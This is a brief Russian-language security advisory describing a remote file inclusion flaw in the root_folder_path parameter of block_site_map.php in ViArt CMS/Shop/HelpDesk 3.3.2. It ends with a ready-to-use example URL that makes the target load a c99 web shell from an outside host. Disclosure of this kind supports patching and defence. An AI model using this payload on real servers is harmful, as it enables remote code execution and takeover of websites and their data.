Программа: ViArt CMS/Shop/HelpDesk 3.3.2
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «root_folder_path» сценарием block_site_map.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
www.RxH.com/viart_cms-3.3.2/blocks/block_site_map.php? root_folder_path=http://no-hack.fr/shell/c99.txt?